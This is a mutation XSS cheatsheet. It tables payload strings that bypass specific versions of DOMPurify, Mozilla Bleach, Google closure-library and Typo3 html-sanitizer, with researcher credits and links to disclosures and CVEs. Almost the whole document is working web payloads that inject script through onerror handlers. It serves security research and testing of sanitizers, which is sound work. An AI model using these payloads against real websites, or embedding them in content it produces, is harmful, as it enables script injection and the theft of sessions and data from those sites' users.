Mutation XSS Cheatsheet

DomPurify

Version	Payload	Credit	Additional links
2.0.0	`<svg></p><style><a id="</style><img src=1 onerror=alert(1)>">`	Michał Bentkowski @SecurityMB	https://research.securitum.com/dompurify-bypass-using-mxss/
2.0.17	`<form><math><mtext></form><form><mglyph><style></math><img src onerror=alert(1)>`	Michał Bentkowski @SecurityMB	https://research.securitum.com/mutation-xss-via-mathml-mutation-dompurify-2-0-17-bypass/
2.0.17	`<math><mtext><table><mglyph><style><!--</style><img title="--></mglyph><img&Tab;src=1&Tab;onerror=alert(1)>">`	Gareth Heyes @garethheyes	https://portswigger.net/research/bypassing-dompurify-again-with-mutation-xss
2.0.17	`<math><mtext><table><mglyph><style><math><table id=”</table>”><img src onerror=alert(1)”>`	@sqrtrev @0xParrot @web_payload team @GuesserSuper	https://twitter.com/0xsapra/status/1307929537749999616?ref_src=twsrc%5Etfw
2.2.0	`<form><math><mtext></form><form><mglyph><svg><mtext><style><path id="</style><img onerror=alert(1) src>">`	Daniel Santos @bananabr	https://vovohelo.medium.com/from-svg-and-back-yet-another-mutation-xss-via-namespace-confusion-for-dompurify-2-2-2-bypass-5d9ae8b1878f
2.2.3	`<svg><xss><desc><noscript></noscript></desc><p></p><style><a title="</style><img src onerror=alert(1)>">`	Michał Bentkowski @SecurityMB	https://twitter.com/SecurityMB/status/1341290687963262978
3.0.8	`<svg><annotation-xml><foreignobject><style><!--</style><p id="--><img src='x' onerror='alert(1)'>">`	Kévin - Mizu @kevin_mizu	https://mizu.re/post/playing-with-dompurify-ce-handling
3.1.0	n = 506; var payload = `${"<div>".repeat(n)}<table id="outer"><caption id="outer"><svg><desc><table id="inner"><caption id="inner"></caption></table></desc><style><a title="</style><img src onerror=alert(1)>"></a></style></svg></caption></table>${"</div>".repeat(n)}`;	icesfont	N/A
3.1.7	`<svg><a><foreignobject><a><table><a></table><style><!--</style></svg><a id="-><img src onerror=alert(1)>">.`	Masato Kinugawa @kinugawamasato	https://x.com/kinugawamasato/status/1843687909431582830
3.2.1	`<math><foo-test><mi><li><table><foo-test><li></li></foo-test>a<a><style><!--</style>a<foo-bar is="--><img src=x onerror=alert(1)>">`	Yaniv Nizry @YNizry	https://yaniv-git.github.io/2024/12/08/DOMPurify%203.2.1%20Bypass%20(Non-Default%20Config)/
3.2.2	`<math><foo-test><mi><li><table><foo-test><li></li></foo-test><a><style><! \${</style>}<foo-b id="><img src onerror='alert(1)'>">hmm...</foo-b></a></table></li></mi></foo-test></math>`	Sean Ng @ensyzip	https://ensy.zip/posts/dompurify-323-bypass/

Mozilla Bleach

Version	Payload	Credit	Additional links
3.1.0	`<noscript><style></noscript><img src=x onerror=alert(1)>`	Yaniv Nizry @YNizry	https://checkmarx.com/blog/vulnerabilities-discovered-in-mozilla-bleach/
3.1.1	`<svg><style><img src=x onerror=alert(1)>`	Yaniv Nizry @YNizry	https://checkmarx.com/blog/vulnerabilities-discovered-in-mozilla-bleach/
3.2.3	`<math><p></p><style><!--</style><img src/onerror=alert(1)>--></style></math>`	Yaniv Nizry @YNizry	https://github.com/mozilla/bleach/security/advisories/GHSA-vv2x-vrpj-qqpq

Google closure-library

Version	Payload	Credit	Additional links
v20190215	`<noscript><p title="</noscript><img src=x onerror=alert(1)>">`	Masato Kinugawa @kinugawamasato	https://github.com/google/closure-library/commit/c79ab48e8e962fee57e68739c00e16b9934c0ffa https://www.youtube.com/watch?v=lG7U3fuNw3A

Typo3 html-sanitizer

Version	Payload	Credit	Additional links
2.0.15	`<!--a foo=--!><img src=x onerror=alert(1)><!--<a>">`	David Klein @ncd_leeN	CVE-2022-36020
2.0.16	`<![CDATA[<math><img src=x onerror=alert(1)>]]>`	David Klein @ncd_leeN	CVE-2022-23499

Resources

Payload examples | mXSS cheatsheet